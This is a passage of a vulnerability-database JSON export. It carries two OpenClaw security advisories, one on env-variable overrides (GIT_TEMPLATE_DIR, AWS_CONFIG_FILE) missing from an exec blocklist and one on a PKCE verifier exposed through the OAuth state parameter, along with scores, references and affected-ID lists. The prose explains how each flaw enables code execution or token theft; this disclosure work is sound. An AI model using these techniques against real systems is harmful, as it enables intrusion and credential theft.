            "summary": "OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override\n## Summary\n\nHost execution env sanitization did not block `GIT_TEMPLATE_DIR` or `AWS_CONFIG_FILE`, even though both can redirect trusted tooling to attacker-controlled content.\n\n## Impact\n\nAn approved exec request could redirect git or AWS CLI behavior through attacker-controlled configuration and execute untrusted code or load attacker-selected credentials.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json, src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6eb82fba3c` (`Infra: block additional host exec env keys`).\n\nOpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41332",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05589",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05576",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0002",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05574",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41332"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m866-6qv5-p2fg",
                    "reference_id": "GHSA-m866-6qv5-p2fg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m866-6qv5-p2fg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41332",
                "GHSA-m866-6qv5-p2fg"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bg1d-gmxy-wkc6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89289?format=api",
            "vulnerability_id": "VCID-bgwh-spue-yybk",
            "summary": "OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gemini OAuth flow reused the PKCE verifier as the OAuth `state` value. Because the provider reflected `state` back in the redirect URL, the verifier could be exposed alongside the authorization code. The `state` value is not secret and travels through the browser redirect, whereas the PKCE verifier is meant to stay with the client until the token request.\n\n## Impact\n\nAnyone who could capture the redirect URL could learn both the authorization code and the PKCE verifier, defeating PKCE's interception protection for that flow and enabling token redemption.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a26f4d0f3ef0757db6c6c40277cc06a5de76c52f` — separate OAuth state from the PKCE verifier\n\nOpenClaw thanks @BG0ECV for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34511",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11185",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11219",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11226",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34511"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a26f4d0f3ef0757db6c6c40277cc06a5de76c52f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9jpj-g8vv-j5mf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34511"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-06T16:56:07Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-pkce-verifier-exposure-via-oauth-state-parameter"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9jpj-g8vv-j5mf",
                    "reference_id": "GHSA-9jpj-g8vv-j5mf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9jpj-g8vv-j5mf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
